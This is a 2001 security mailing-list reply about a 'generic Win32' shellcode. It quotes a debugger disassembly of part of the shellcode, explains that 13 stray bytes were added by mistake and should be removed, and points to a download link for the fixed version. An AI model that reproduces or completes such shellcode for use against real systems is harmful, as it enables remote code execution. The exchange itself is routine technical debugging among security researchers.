Re: AW: GENERIC Win32 Shellcode

[RaiSe <raise () netsearch-ezine com>]

On Mon, 20 Aug 2001, Der HexXer wrote:

> Why do you have an relative jump to [ShellCode-Entry] - 7 Bytes
> at the beginning of your code?
> (the first jump should be EIP+11 bytes: \xEB\x0B\x...)
>
> Debug: (added 4 nops; entry: 00401000)
>   00401003 90                   nop
>   00401004 EB F7                jmp         00400FFD ;???
>   00401006 8D 76 17             lea         esi,[esi+17h]
>   00401009 8B FC                mov         edi,esp
>   0040100B 8B D7                mov         edx,edi
>   0040100D F3 A4                rep movs    byte ptr [edi],byte ptr [esi]
>   0040100F 52                   push        edx
>   00401010 C3                   ret
>   00401011 EB 30                jmp         00401043 ;eip should jump to
> this address
>  ;00401228 E8 E6 FD FF FF       call        00401013
> =>00401013 5F                   pop         edi

Hello. I am sorry :(, i had a mistake when i was passing asm code to C
code. I copy 13 bytes befero shellcode that are trash. The original
shellcode begin in 00401011 EB 30 jmp 00401043. You must delete 13 bytes
before '\xEB\x30', or you can download fixed shellcode from
'http://www.undersec.com/programas/generic-win32.c'. It is bad, but it is
good too, because shellcode is 13 bytes smaller ;D. Thanks very much and
sorry.


==============-----------------------------==============
RaiSe
UNDERSEC Security Team / http://www.undersec.com
NetSearch Ezine Staff  / http://www.netsearch-ezine.com
ysfk>2{5~~2s~eska2~}dw2k}g<<< XOR 18
==============-----------------------------==============